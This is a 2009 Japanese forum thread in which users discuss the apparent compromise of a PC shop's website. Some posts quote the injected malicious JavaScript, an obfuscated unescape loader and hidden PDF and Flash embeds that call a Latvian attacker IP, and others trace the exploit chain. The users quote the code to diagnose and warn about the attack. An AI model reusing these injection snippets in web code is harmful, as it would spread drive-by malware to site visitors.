【注文0.1】Genoのサイトでウイルス感染…か?
1 :
PAC-3(愛知県) :
2009/04/04(土) 20:26:42.29 ID:LwZTYQaJ BE:1137045593-PLT(12000) ポイント特典 中古PCとPCパーツの通販ショップGENO
ttp://www.geno-web.jp/ 【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/326- 326 名前:名無しさん[sage] 投稿日:2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
2台試して、2台とも起きた。
もしかしてウィルスに感染してる?
328 :名無しさん:2009/04/04(土) 10:57:08 0
FirefoxでGENOのHPを開くと落ちるようになったw
343 :名無しさん:2009/04/04(土) 15:11:06 0
隔離不可能・・・
これはシャレにならないくさい
365 :名無しさん :sage :2009/04/04(土) 18:12:49 0
http://up2.viploader.net/pic/src/viploader968130.jpg ゲノを開いた途端にこのザマw
377 :名無しさん :sage :2009/04/04(土) 19:16:24 0
GENO開くとアクロバットリーダーが起動する
381 :名無しさん :sage :2009/04/04(土) 19:59:32 0
genoルートキットかPHPのスクリプト改ざんされてる
パスワードとか全部抜かれてる可能性ある
94.247.2.195につなごうとしてるが何をされていることやらw
依頼308
2 :
PAC-3(東京都) :2009/04/04(土) 20:26:57.25 ID:ncVdzkEa BE:124870032-2BP(7000)
3 :
SM-3(神奈川県) :2009/04/04(土) 20:27:30.95 ID:B9teHKIl
そこではないが昨日 Firefoxが落ちたわ ウィルスでもいいや
4 :
SM-3(愛知県) :2009/04/04(土) 20:27:52.79 ID:rFfwJOb/ BE:1194327348-2BP(5334)
僕の肛門もウイルスに犯されそうです
5 :
SM-3(アラバマ州) :2009/04/04(土) 20:28:25.96 ID:9ZEDlD4a
カブトムシくせーな
6 :
市民団体(茨城県) :2009/04/04(土) 20:29:18.00 ID:D7eKpP/4
Operaで見た
7 :
SM-3(千葉県) :2009/04/04(土) 20:29:36.42 ID:kylTVVAd BE:34578634-2BP(433)
まさかヌー即に立つとは
8 :
SM-3(愛知県) :2009/04/04(土) 20:29:44.16 ID:bPaUGP2k
何も起きない件
9 :
遺憾の意(島根県) :2009/04/04(土) 20:30:00.81 ID:d9khGStS
ゴミ袋売った報復だろ
ChromeでみたらどんどんPF食われてってワロタ
12 :
PAC-3(大阪府) :2009/04/04(土) 20:31:09.61 ID:3aTmrMld
踏んじまったああああああああああああああ
13 :
SM-3(千葉県) :2009/04/04(土) 20:31:38.03 ID:kylTVVAd BE:184416588-2BP(433)
14 :
PAC-3(埼玉県) :2009/04/04(土) 20:31:50.44 ID:DqSHaud0
GENOの500円MP3プレイヤーだけはガチ
>>10 なんだよこれw俺のQ9550が悲鳴をあげてる
昨日見てたところだわ ニアミスこえええええええ
18 :
SM-3(東京都) :2009/04/04(土) 20:32:38.20 ID:1m1YHK53
19 :
PAC-3(アラバマ州) :2009/04/04(土) 20:33:04.11 ID:NHCCJosI BE:440746439-S★(1012625)
GenoでEee900A買ったが見事に使い道がない。
20 :
PAC-3(アラバマ州) :2009/04/04(土) 20:33:12.76 ID:CeBouDDG
firefoxだと感染しないのか?
21 :
SM-3(アラバマ州) :2009/04/04(土) 20:33:16.57 ID:toMO9lIU
よくgeno見るけどというか今も開いてるけどやばいのか
22 :
九条(東京都) :2009/04/04(土) 20:33:33.34 ID:eQaKNYvA
パソコン蛾物故割れた
23 :
SM-3(愛知県) :2009/04/04(土) 20:33:34.14 ID:nj2O7UBY BE:1343617294-2BP(5334)
24 :
PAC-3(新潟県) :2009/04/04(土) 20:34:02.08 ID:b9q02XH+
25 :
市民団体(茨城県) :2009/04/04(土) 20:34:18.23 ID:D7eKpP/4
ハロワの紹介無いと駄目だよ
27 :
PAC-3(大阪府) :2009/04/04(土) 20:35:15.89 ID:3aTmrMld
23 名前:あぼ〜ん[あぼ〜ん] 投稿日:あぼ〜ん
28 :
市民団体(アラバマ州) :2009/04/04(土) 20:35:19.31 ID:jWSry88R
えっ、いつからやばいの?
29 :
SM-3(茨城県) :2009/04/04(土) 20:35:51.11 ID:Baun27DU
さっきブックマしてたGENOの商品ページを開いたけど大丈夫だったわ ウィルス仕込まれてるのはトップページだけ?
30 :
PAC-3(アラバマ州) :2009/04/04(土) 20:36:25.40 ID:QohG2plF
そういえば昨日chromeで開いたけど何もなかったな firefoxだけ?
31 :
SM-3(愛知県) :2009/04/04(土) 20:36:36.66 ID:bPaUGP2k
32 :
PAC-3(千葉県) :2009/04/04(土) 20:37:04.44 ID:h7sxtlNS
Macで特攻してくる
33 :
SM-3(神奈川県) :2009/04/04(土) 20:37:32.38 ID:SFqlwAOu
ここスゲー重いんだよな 見るからに怪しい
34 :
PAC-3(東京都) :2009/04/04(土) 20:37:36.23 ID:GFvMgHmb
35 :
PAC-3(アラバマ州) :2009/04/04(土) 20:37:50.85 ID:kGb0hx4u
JavaScriptを無効にすると普通に見えるな。
36 :
PAC-3(東日本) :2009/04/04(土) 20:37:57.61 ID:LBWTAiym
37 :
PAC-3(埼玉県) :2009/04/04(土) 20:38:13.55 ID:DqSHaud0
>>31 下のオリンパスのデジカメ安いな
今って800万画素もこんなに安く買えるのか?
38 :
PAC-3(愛知県) :2009/04/04(土) 20:38:58.43 ID:xUqsWU0Q
俺も夕方頃にゲロHP開いちゃったんだよなぁ
39 :
SM-3(東京都) :2009/04/04(土) 20:39:03.42 ID:PzcLOc1d
ヤニをくれああががkぇrjklgたいお3gぱ3wq5い
アクロバット入れてないと普通に見れるね。 アクロバットの脆弱性つかれて、見たやつあぼーん
41 :
遺憾の意(岐阜県) :2009/04/04(土) 20:39:11.13 ID:2zU2O2Gh
さっき見てたが何もなかったぞ@火狐
42 :
SM-3(兵庫県) :2009/04/04(土) 20:40:19.28 ID:/SZjr3nx
>>33 でもこういういかにも怪しいB級ショップみたいなほうがワクワクするよね
43 :
九条(埼玉県) :2009/04/04(土) 20:40:33.39 ID:iS8mdEat
あくろばっと入れてない俺大料理!!
45 :
SM-3(埼玉県) :2009/04/04(土) 20:41:12.77 ID:l4PBGLcv
8.1.4でもダメ?
46 :
SM-3(千葉県) :2009/04/04(土) 20:41:13.95 ID:kylTVVAd BE:17289623-2BP(433)
入れなくて良かったAcrobat
入れてて良かったfoxitreader
47 :
九条(関西地方) :2009/04/04(土) 20:41:19.56 ID:07htsYNd
おれもなったわ Acrobat起動しようとすんのな
いまどきpdfでAcrobatはないわ
51 :
SM-3(西日本) :2009/04/04(土) 20:42:58.44 ID:rR350irq
PDF-XChangeなら大丈夫のようだ
52 :
九条(東京都) :2009/04/04(土) 20:43:03.71 ID:eQaKNYvA
53 :
PAC-3(東京都) :2009/04/04(土) 20:43:39.15 ID:rcx+yD3o
54 :
PAC-3(東京都) :2009/04/04(土) 20:45:03.55 ID:4XDNREzV
acrobatなんて入れてないや
あとNoScriptで
8.14入りでHP行ったけど重いぐらいで変化ないが どんな挙動すんのさ?
57 :
SM-3(埼玉県) :2009/04/04(土) 20:45:31.54 ID:l4PBGLcv
>>52 なんと、じゃあ未修正だな
こんな身近で発生するとは
58 :
九条(埼玉県) :2009/04/04(土) 20:47:41.04 ID:iS8mdEat
なんともなくてつまんね いつも通り重いけど
59 :
九条(関西地方) :2009/04/04(土) 20:48:10.31 ID:07htsYNd
うちはAcrobatのセキュリティ問題がニュースに出たときに Readerの設定でJavaScript無効にしてたので Genoのサイトにアクセスすると「Java使うよ?」てなダイヤログボックスが出た
60 :
九条(チリ) :2009/04/04(土) 20:49:11.16 ID:6m30GvF8
え?マジ? さっき開いたぞ・・・
61 :
SM-3(アラバマ州) :2009/04/04(土) 20:49:52.89 ID:toMO9lIU
開きなおしたら落ちたw 偉いメモリ喰ってブラウザがフリーズした
62 :
PAC-3(catv?) :2009/04/04(土) 20:50:51.75 ID:u9JQ2i9I
Opera落ちた
63 :
PAC-3(東京都) :2009/04/04(土) 20:50:57.27 ID:L9HFX/07
>>46 Firefoxのアドオンかと思ったら全然違った
> Genoのサイトにアクセスすると「Java使うよ?」てなダイヤログボックスが出た 俺も今日アクセスしたら出たけど なんだこれ思ったけど無視した セーフだったな
65 :
PAC-3(catv?) :2009/04/04(土) 20:52:49.45 ID:u9JQ2i9I
WpO1iRPgw6lc4aって何だよ
OSだのブラウザなら自動アップデートがあるが 他のソフトはアップデートしない情弱ばかりだからね flashだのadobeだの
67 :
九条(関西地方) :2009/04/04(土) 20:53:02.32 ID:07htsYNd
Adobe Reader開いて [編集]→[環境設定]→[JavaScript]→[Adobe JavaScriptを使用]のチェックを外すんだ
68 :
SM-3(長野県) :2009/04/04(土) 20:55:05.57 ID:kvKLMhYK
>nslookup www.geno-web.jp IP Address = 122.221.10.234 Host Name = 122x221x10x234.ap122.ftth.ucom.ne.jp
まさにアイグージェノサーイ
70 :
SM-3(西日本) :2009/04/04(土) 20:57:23.36 ID:rR350irq
重いAdodeReaderを多重起動させてリソースくわせようとしてんのかな
GoogleChromeがクラッシュした
俺の最強のOperaが敗れるとは。。。
73 :
九条(北海道) :2009/04/04(土) 21:00:00.20 ID:OK+qDHfc
IPアドレス 94.247.2.195 ホスト名 hs.2-195.zlkon.lv IPアドレス割当国 ラトビア ( lv ) ラトビア?
74 :
SM-3(東京都) :2009/04/04(土) 21:00:32.82 ID:irZOBEjT
具体的に何がどうまずいんだ。
76 :
PAC-3(山形県) :2009/04/04(土) 21:02:59.92 ID:bQQBTCIL
77 :
SM-3(千葉県) :2009/04/04(土) 21:03:52.46 ID:kylTVVAd BE:34578443-2BP(433)
foxitreaderのスクリプト設定はどうなってるかと見てみたら
デフォルトではスクリプト機能してないな。
専用のアドイン入れないといけない。いや〜助かった。
まあ、acrobat用の脆弱性だろうけど
おれなんてウイルスソフトが破壊されて立ち上がらなくなって 入れなおしても何故かダメで システムの復元で大丈夫になったくさいけど、 復元ポイントが数日前のだったからか、こんどは他のアプリがおかしくなった あーイライラする・・・
381 名前:名無しさん[sage] 投稿日:2009/04/04(土) 19:59:32 0
genoルートキットかPHPのスクリプト改ざんされてる
パスワードとか全部抜かれてる可能性ある
94.247.2.195につなごうとしてるが何をされていることやらw
382 名前:名無しさん[sage] 投稿日:2009/04/04(土) 20:00:41 0
>GENO開くとアクロバットリーダーが起動する
こういうの怖すぎるな
383 名前:名無しさん[sage] 投稿日:2009/04/04(土) 20:19:16 0
>>381 ttp://www.aguse.jp/?m=w&url=94.247.2.195&media=1&x=64&y=10 非営利団体SPAMHAUSプロジェクトによる
IPアドレスベースの送信者ブラックリスト
に反応ありますな
80 :
九条(北海道) :2009/04/04(土) 21:06:07.31 ID:yyAfrG7G
あそこいつも重いよね
81 :
SM-3(西日本) :2009/04/04(土) 21:06:43.91 ID:rR350irq
>>78 興味本位の質問なんだが
ウイルスソフトは何使ってたの?
82 :
PAC-3(大阪府) :2009/04/04(土) 21:07:53.26 ID:3aTmrMld
>>79 ((((((;゚Д゚))))))ガクガクブルブル
83 :
九条(埼玉県) :2009/04/04(土) 21:09:50.07 ID:iS8mdEat
IE8、opera、チョロメ、プニルどれで開いてもフツー開く。 ウィルス対策ソフトが無反応で逆に怖いw
>>81 ウイルスバスター2008
ちゃんとブロックしたっぽかったけど、再起動したらおかしくなってた
>>83 アクロバット入れてないなら大丈夫でしょ
85 :
九条(埼玉県) :2009/04/04(土) 21:13:00.82 ID:iS8mdEat
>>84 あくろばっと入れて無くてもどっかに繋がれたりしない?
確認の方法無いの? 若干HDDにアクセスが多い以外変化無いんだけど
87 :
SM-3(千葉県) :2009/04/04(土) 21:15:36.02 ID:kylTVVAd BE:34578443-2BP(433)
ブラウジング用のoperaで見る分には全部切ってるしProxomitron様が居るから怖い物無しだが
ショッピングサイトとか信頼済みでIEで見るような所がウイルス感染は毎度の事ながら恐ろしいなw
88 :
SM-3(兵庫県) :2009/04/04(土) 21:16:19.48 ID:/SZjr3nx
genoのことだから後の対応も適当に済ますんだろなー
89 :
九条(関西地方) :2009/04/04(土) 21:17:16.92 ID:07htsYNd
TCP Monitor Plus入れて接続先をモニターするとか
90 :
SM-3(西日本) :2009/04/04(土) 21:17:22.10 ID:rR350irq
>>84 なるほど、バスターか・・・
でもバスターには悪い思い出しかない
試用期間中にCPU使用率100%のバグでOSクラッシュ起こしたんよ
今はESETに落ち着いてる
91 :
SM-3(千葉県) :2009/04/04(土) 21:18:25.96 ID:kylTVVAd BE:25934033-2BP(433)
以前BenQのサイトもやられてたな
このスレタイはアウト 虚偽風説流布業務妨害 威力業務妨害
ノートンも反応無かったけど sleipnirじゃ抑止効果ない?
94 :
SM-3(東海) :2009/04/04(土) 21:21:22.87 ID:QImxbdLs
アクアバットのぜいじゃくせいを突いてくるとは やつらもやるな
Firefoxが超不安定になった><
バーチャルPCで踏んでみるから強力なのクレ
通販サイトでHP乗っ取られるなんて危険すぎるな GENOの顧客の個人情報が全部漏れた可能性もあるだろうが
98 :
九条(埼玉県) :2009/04/04(土) 21:24:30.20 ID:iS8mdEat
ファイアフォールのTCPモニタで見てみたら、サイトを開いた直後に94.247.2.195に繋いで数バイト送信してたww
99 :
PAC-3(宮城県) :2009/04/04(土) 21:26:24.32 ID:WyHO9jN2
クレジットカード使う店はちゃんと考えないとやばいんだな・・・
//94.247.2.195/news/?id=100 最終的に↑を読み込んでいるが、なにしてんだかはわからん
ajax_lib.jsの最後に余計な行が加えられてるな。 それが94.247.2.195へアクセスさせてる。
103 :
PAC-3(埼玉県) :2009/04/04(土) 21:31:10.92 ID:DqSHaud0
用心してネット売買専用のPC使ったりしてても その店でデータ抜かれるんじゃ防ぎ様が無いよなw
104 :
九条(埼玉県) :2009/04/04(土) 21:32:32.06 ID:iS8mdEat
94.247.2.195に何か送信してるw
105 :
SM-3(神奈川県) :2009/04/04(土) 21:34:51.81 ID:iwpIoA4i
どうすりゃいいの??><
もっかいアクロバッドJAVAチェックしていってみる
ajax_lib.jsだけじゃなく、他のも書き換えられてた。
108 :
九条(東京都) :2009/04/04(土) 21:38:19.60 ID:eQaKNYvA
何を送信してたのか気になるな
109 :
SM-3(滋賀県) :2009/04/04(土) 21:38:38.37 ID:tpDfswNW
110 :
PAC-3(宮城県) :2009/04/04(土) 21:39:07.89 ID:WyHO9jN2
パケット解析まかせた
111 :
SM-3(神奈川県) :2009/04/04(土) 21:39:56.80 ID:p6hP6SI0
その前になんでgeno? genocide(大量虐殺)くらいしか思いつかんが。
アドオンは普通無効にしてるだろ
114 :
SM-3(大阪府) :2009/04/04(土) 21:44:46.67 ID:ykEIWKbD
PF食われまくってガチガチになったと思ったらやっぱりgenoだったか これどうなってんの?何度か見に行ってしまった・・・
genoといえば・・・ ニュー即理系部員の場合・・・genome ニュー即文系部員の場合・・・genova ニュー即犯罪者予備軍の場合・・・genocide
116 :
市民団体(熊本県) :2009/04/04(土) 21:45:34.17 ID:6ZNVbLLQ
>>90 今回のはESET/NOD32じゃ検知できてないっぽい
ZEROも絶賛スルー中
Avast!、カスペ、バスターは検知してくれる
うむ うちもESETで華麗にスルーだ
javaチェック外そうが入れようが94.247.2.195とは送受信してるんだけど もうよくわからん
119 :
PAC-3(埼玉県) :2009/04/04(土) 21:47:18.23 ID:DqSHaud0
やっぱ代引きが安全なのかな ネットでクレカなんて怖くて使えん
勿論我らがAVGはちゃんと防御してくれるんだろうな。
121 :
SM-3(島根県) :2009/04/04(土) 21:47:49.52 ID:OfBH11+p
クッキー 自動入力 オートコンプリート そして注文 送信
122 :
PAC-3(神奈川県) :2009/04/04(土) 21:49:00.02 ID:g8GEW1Lt
まじか この間genoで通販しちゃった俺涙目
123 :
PAC-3(神奈川県) :2009/04/04(土) 21:49:50.23 ID:htlNnpCy
VIPの屑どもを嵌めるか
124 :
PAC-3(アラバマ州) :2009/04/04(土) 21:50:18.79 ID:Tqe4DIH1
なんの問題もない。 ただ、AcrobatReaderは最新だが。
>>112 Adobe Reader 9.1.0はセーフなんだよね?
>>100 document.write("<div style=\"position:absolute; left:-1000px;
top:-1000px;\">");document.write('<embed width=100 height=100
src="
http://94.247.2.195/news/?id=2 " type="application/pdf"><
/embed>');document.write('<embed width=100 height=100 src="ht
tp://94.247.2.195/news/?id=3"></embed>');document.write("</di
v>");
あとは頼む.
なんかフラッシュのActionscriptも実行しているみたいだが。。
やっぱ信頼できるところで買わないとダメだな。
genoなんか信頼できないだろ。 偽物のDVDドライブだか売ってたじゃん。
なんとも無いけど個人差があるのか?
genoのサイト開いた時に勝手にpdfが開いてなければセーフ?
131 :
PAC-3(コネチカット州) :2009/04/04(土) 21:56:18.63 ID:a5cPyP9o
ウイルス収集家の俺が華麗にゲット JPCERTでも警告出てたAdobe Readerの穴使う奴くさいな
132 :
SM-3(西日本) :2009/04/04(土) 21:57:47.78 ID:rR350irq
検体以前にアップデートをきちんとすることだな
134 :
遺憾の意(岐阜県) :2009/04/04(土) 22:00:51.81 ID:2zU2O2Gh
途中HDDが急に遅くなったんだけど心配。 ノートンは検知なし。
136 :
PAC-3(長屋) :2009/04/04(土) 22:01:33.64 ID:by8MtpW7
reader9使ってる俺大勝利w
>>130 リーダーが開かなくてもプロセス見ると実行されていて
メモリが430MBくらい食われてた
138 :
SM-3(アラバマ州) :2009/04/04(土) 22:04:54.36 ID:yNYylLXk
http://www.geno-web.jp/ code = 200
base =
http://www.geno-web.jp/ body =
<html>
<head>
<META HTTP-EQUIV='CHARSET' CONTENT='Shift_JIS'>
<META HTTP-EQUIV='CONTENT-LANGUAGE' CONTENT='Japanese'>
<meta http-equiv='Content-Type' content='text/html; charset=Shift JIS'>
<title>中古パソコンとパソコンパーツの通販ショップGENO</title>
<meta name="description" content="激安!中古パソコンなら通販ショップGENO。お買い得商品から掘り出し物も見つかるかも。今すぐアクセスして確認してください!">
<meta name="keywords" content="中古パソコン,パソコン,パソコンパーツ,周辺機器,モニタ,ノートパソコン,サーバー,リサイクル">
<meta name="author" content="GENO">
<meta name="verify-v1" content="9NtgdPv9e8UfOFJPFckDs3EjEAL1qhllG7ieKGSVdXo=" />
</head>
<!--frameset用のHTMLにはbodyタグを書いてはダメです。winなどではページが見れなくなります。-->
<frameset rows="65,*" border=0 MARGINEWIDTH=0 MARGINHEIGHT=0>
<frame src="
http://www.geno-web.jp/TopMenu.html " name=topmenu MARGINWIDTH="0" MARGINHEIGHT="0" scrolling=no noresize>
<frame src="
http://www.geno-web.jp/MainMenu.html " name=main MARGINWIDTH="0" MARGINHEIGHT="0" scrolling=auto>
</frameset>
<!-- Google analytics -->
<script src="
http://www.google-analytics.com/urchin.js " type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-524772-1";
urchinTracker();
</script>
</html>
140 :
PAC-3(コネチカット州) :2009/04/04(土) 22:06:48.83 ID:Lr3xTcJq
>>137 XPでメモリ1GBだが、
俺もメモリ食われてた。
acrobat未インストール、fxで開いてfirebugのモニタで追ってみた フレームのどれかに、oHY.pdfというやつがいて、94.247.2.195から参照されてるっぽい
他にもpdfやswfもあるっぽい
143 :
九条(埼玉県) :2009/04/04(土) 22:10:58.41 ID:7ITBeElJ
>>141 そこ非営利団体SPAMHAUSプロジェクトによるIPアドレスベースの送信者ブラックリストにのってるね
144 :
九条(北海道) :2009/04/04(土) 22:12:06.20 ID:OK+qDHfc
偽のセキュリティソフトをインストールするトロイらしいな
145 :
PAC-3(長屋) :2009/04/04(土) 22:13:00.04 ID:gni6nfGc
これ2ch見てない人気づかないんじゃない? Genoはトップページにデカく経緯を乗せとけよ
146 :
九条(静岡県) :2009/04/04(土) 22:14:01.70 ID:d8n7PfAk
狐3.08で何度アクセスしても 124.32.208.29 122.221.10.234 にしか繋ぎに行かないけど・・・
genoに知らせたやついんの?てかもう店も気づいてるか
USBメモリ10円の神価格かと思ったら数量1の上に総量糞高い糞の店だし潰れろよ
まじかよー 2,3日前安いノートの宣伝を2chでみて開いちゃったぞ
150 :
SM-3(愛媛県) :2009/04/04(土) 22:16:03.01 ID:bFblCgp7
朝から報告あるのにまだ放置されてるってこと? もう修正されてるんでしょ?
151 :
遺憾の意(長屋) :2009/04/04(土) 22:16:38.59 ID:dmqbo983
ふーん
>>147 気づいてたら速攻でページを一時的に閉鎖するだろ?
告知なんて閉鎖した後で書けばいいだけだし
153 :
PAC-3(長屋) :2009/04/04(土) 22:17:53.98 ID:by8MtpW7
まぁ、小数点以下の注文が出来ちゃう店だし、鯖缶のクオリティに期待する方が・・・
まーだ直ってなかったのか さすがSTEPの残骸
生成されたHTMLソース見てるが、埋め込みでpdfが記述されてんな あと、jqueryも読み込んでら ワンセットのクラックか?
157 :
PAC-3(広島県) :2009/04/04(土) 22:22:04.52 ID:BOXqwiXH
NoScript入れてて助かった
このサイト利用者の個人情報はザルだと思った方が良さそうだな
http://www.geno.co.jp/xmlrss/ajax_lib.js に
document.write(unescape('%3C4x4sWXkcr4Si4x4plct4x4%20P0srP0cWXk%3DC2%2F%2F4x49lc4lc%2EP02C247lc%2E4S2%2E1lc95%2FP0jP0qu4x4erP0y%2Ejs%3E4x4%3Cmb%2FC2s4x4cript4S%3E').replace(/WXk|4S|P0|4x4|mb|lc|C2/g,""));
って書いてあるね
unescapeすると
<script src=//94.247.2.195/jquery.js></script>
になる。
アクセスしちゃだめだぞw
もっと優しく教えてくれ どうなる?
161 :
PAC-3(長屋) :2009/04/04(土) 22:25:59.02 ID:gni6nfGc
163 :
SM-3(アラバマ州) :2009/04/04(土) 22:30:49.36 ID:wJCAg1YX
他のPDFファイルが開けなくなった
XPにてFirefox(最新)、Acrobat9で昼間Genoサイト見て固まったんで 再起動掛けたんだが、抜かれたり仕込まれたりってあるのかな? Avastは何も反応しなかたんだが、今フルスキャン中・・・ AcrobatもUpdate中
Adobe Readerを8.1.4から最新版にしてアクセスしたら、 余計負荷が高まった感じ。
166 :
PAC-3(中国地方) :2009/04/04(土) 22:32:25.29 ID:9XvLSivI
8.12だったけど メモリ食いまくってIE8がフリーズしただけだった これってセフセフなの?
167 :
SM-3(アラバマ州) :2009/04/04(土) 22:32:44.37 ID:aDPuFIpP
>>164 JavaScript切ってなければアウチ
168 :
PAC-3(千葉県) :2009/04/04(土) 22:35:13.37 ID:JZ0oXwSW
>>164 うちも最近何回かGenoのサイトを見てたんで
ノートン先生の4/3付けの最新パターンファイルファイルで
スキャンしたけど、なんも出なかった。
>>139 によるとノートン(Symantec)もまだ検出できてない
>>167 レスありがとです。
・・・何抜かれてるんだろう(ガクガクブルブル)
171 :
SM-3(アラバマ州) :2009/04/04(土) 22:37:19.09 ID:aDPuFIpP
172 :
市民団体(アラバマ州) :2009/04/04(土) 22:37:49.50 ID:NFzfjhkD
javascriptも何もかも全部切ってちょっと見てこようかな
173 :
PAC-3(東京都) :2009/04/04(土) 22:38:14.41 ID:Sy951pFR
もしかしてavast大勝利?
>>170 いま調べてる
PC内に抜かれてやばいモノがなければとりあえずはOK
普通に面白がって何回も見てるんだが、これってやばいのか?俺もがくぶるなってきた
たいていこういうのはネトゲのIDパスとかでしょ抜かれるのって
179 :
SM-3(アラバマ州) :2009/04/04(土) 22:39:57.40 ID:Hm/U9QPg
君子危うきに近寄らず くわばらくわばら
180 :
PAC-3(アラバマ州) :2009/04/04(土) 22:41:48.49 ID:QohG2plF
Adobe Readerの最新版って9じゃなかったっけ
181 :
PAC-3(アラバマ州) :2009/04/04(土) 22:41:55.26 ID:hhzS2/B7
>> 176 ポップアップブロックが作動してDLされなかった。。。。 これはセーフ?
182 :
SM-3(千葉県) :2009/04/04(土) 22:42:01.81 ID:kylTVVAd BE:80682274-2BP(433)
>>176 cmd.exeあるよおれおわった(ぼうよみ)
183 :
九条(埼玉県) :2009/04/04(土) 22:42:14.42 ID:iS8mdEat
何抜かれるのか見るためにアドビ入れようかな
184 :
SM-3(福岡県) :2009/04/04(土) 22:43:03.20 ID:+nXaajtd
別に抜かれて困るようなモノは無いが・・・アクセスしてみるか
185 :
市民団体(アラバマ州) :2009/04/04(土) 22:43:07.36 ID:NFzfjhkD
>>159 /*
* jQuery JavaScript Library v1.3.1
*
http://jquery.com/ *
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
*
http://docs.jquery.com/License *
* Date: 2009-01-21 20:42:16 -0500 (Wed, 21 Jan 2009)
* Revision: 6158
*/
javascript読めないんだけど、メインには何が書いてあるんだろ
186 :
PAC-3(千葉県) :2009/04/04(土) 22:43:43.91 ID:JZ0oXwSW
>>180 うん。
うちはAcrobat 9 Pro Extendedの9.1.0を入れてるけど。
写真が抜かれてぼっさん的な存在になったら嫌だな
188 :
市民団体(北海道) :2009/04/04(土) 22:44:40.69 ID:PXU7GSKy
ttp://www.geno-web.jp/ を開くと
この Web サイトはサイトは、'Microsoft Corporation' からの 'Microsoft Data Access
- Remote Data Services Dat…' アドオンを実行しようとしています。Web サイトと
アドオンを信頼し、アドオンの実行を許可するには、ここをクリックしてください...
ってメッセージが出るけどクリックしても安全?
189 :
PAC-3(千葉県) :2009/04/04(土) 22:44:56.19 ID:JZ0oXwSW
Process Explorerでプロセス一覧見ても普段どおりだな。。。
flashもアップデートしとけよ どうせそのうち似たようなこと起こるから
191 :
PAC-3(アラバマ州) :2009/04/04(土) 22:45:33.23 ID:hhzS2/B7
>>188 なかはラメええええええええええええええええええええ
192 :
PAC-3(千葉県) :2009/04/04(土) 22:45:40.36 ID:JZ0oXwSW
194 :
SM-3(埼玉県) :2009/04/04(土) 22:46:08.70 ID:+4Vv+9dp
195 :
九条(アラバマ州) :2009/04/04(土) 22:46:26.79 ID:0uUdAGDa
じゃあgenoでマカフィーも買えばいんじゃね?
196 :
PAC-3(愛媛県) :2009/04/04(土) 22:46:34.90 ID:qaRIQ28+
genoオワタ?
cmd.exeって普通にsystem32フォルダにあるんじゃないのか? 俺もあった
今走ってるかどうかじゃないの ちなみにコマンドプロンプトのことな
199 :
PAC-3(千葉県) :2009/04/04(土) 22:48:41.46 ID:JZ0oXwSW
>>185 それ自体は普通にAJAXで使われるjQueryライブラリなんだけど、
恐らく、その不正アクセス先にアクセスするとjQueryライブラリを利用した
別のjQueryスクリプトが走って
それで何らかの情報が抜かれるんだと思う。
プロセスが動いてるかどうかってこと コマンドプロンプト開いてなけりゃcmd.exeは普通動いてない
動いてなきゃいいのね、すまそ
ただのコマンドプロンプトだろ…
cmd.exeすらない… アクセスしてないけど
204 :
九条(dion軍) :2009/04/04(土) 22:49:01.60 ID:ZsrR7JHv
genoは昔はもっとましだった気がするが 最近はゴミしかない
205 :
PAC-3(アラバマ州) :2009/04/04(土) 22:49:35.68 ID:hhzS2/B7
そのcmdファイルが改ざんされて、変なことさせるんじゃね? まさになりすましのトロイの木馬
>>197 そうじゃなくて、タスクマネージャのプロセスにコマンドプロンプト使ってないのにcmdがあったらアウトってこと。
>>159 unescapeすると、じゃなくてunescapeしてreplaceすると、だった
94.247.2.195/jquery.jsを見てみたんだが、これjQueryを改造してあるね。
94.247.2.195/news/?id=100
にアクセスするよう仕込んであった。
で、94.247.2.195/news/?id=100 にはNo newsとか書いてあるんだが、ソースを見るとキャラコードで暗号化されたスクリプトが仕込んであって、それを解読すると
・94.247.2.195/news/?id=2 をPDFとして開く
・94.247.2.195/news/?id=3 を開く
といった動作をするようになっていた。id=2はPDFで、id=3はFlash。
くれぐれも注意、↑のURLは間違いなくウィルスなので開こうとしないこと。
>>182 cmd.exeファイル自体は存在するのが当たり前では?
タスクマネージャで実行されてたら問題ありだけど。
209 :
SM-3(関東・甲信越) :2009/04/04(土) 22:50:26.30 ID:gy44O9nG
試しにアクセスしてみたら、スパムメールサーバーがポート叩いて来るよ
210 :
PAC-3(アラバマ州) :2009/04/04(土) 22:50:55.76 ID:iDKdHx60
システム復元&アドビ削除でおk?
211 :
PAC-3(アラバマ州) :2009/04/04(土) 22:51:58.22 ID:hhzS2/B7
いんたーねっとて怖すぎ><
geno終わったな
213 :
九条(dion軍) :2009/04/04(土) 22:52:21.90 ID:ZsrR7JHv
俺のexpert PDFがこんなところで役に立つとは。 思いから捨てようと思ってた
214 :
SM-3(埼玉県) :2009/04/04(土) 22:52:41.56 ID:+4Vv+9dp
Mac OSXのFirefoxもアウトです。
215 :
SM-3(島根県) :2009/04/04(土) 22:52:51.78 ID:OfBH11+p
>210 違う。AppleでMac購入
Foxitが流行ってたこともあるけど今はもう廃れたのかな
なんかこのスレの人たちかっこいい
218 :
SM-3(千葉県) :2009/04/04(土) 22:54:20.00 ID:kylTVVAd BE:34578162-2BP(433)
>>208 ああ、すまん。ネタじゃなくてマジだったのね^^;
219 :
PAC-3(アラバマ州) :2009/04/04(土) 22:54:25.34 ID:hhzS2/B7
諸君! こんなめにあわせてくれたGENOをどうしてくれようか?
220 :
九条(北海道) :2009/04/04(土) 22:54:40.65 ID:OK+qDHfc
>>199 オリジナルのjQueryとdiffかけてみると分かるんだけど、jQueryを改造してあるよ
今から踏んで来る
223 :
遺憾の意(岐阜県) :2009/04/04(土) 22:55:41.60 ID:2zU2O2Gh
4/3のセールでレノボのミニノート3万くらいで10台出てて即完売してたけど購入したやつ(((;゚д゚)))
225 :
PAC-3(東京都) :2009/04/04(土) 22:56:24.58 ID:Sy951pFR
cmd.exeを起動したことがないのにconime.exeが常駐してたら cmd.exeが実行されたってことだな(XP)
226 :
遺憾の意(岐阜県) :2009/04/04(土) 22:56:26.30 ID:2zU2O2Gh
>>218 俺、テンパってるんでネタに反応できんw
228 :
PAC-3(千葉県) :2009/04/04(土) 22:57:30.99 ID:JZ0oXwSW
>>209 昔流行ったイオナズンスクリプトみたいに踏み台にされちゃうのかも知れないね。
つまり今気づかずにクレジットカードで買い物している人は 明日には偽のカードが作られて東欧あたりで不正利用されるってことかな
CCCなんてカッコいいexeいてはりますけど怖くネ?
231 :
PAC-3(千葉県) :2009/04/04(土) 22:58:18.23 ID:JZ0oXwSW
232 :
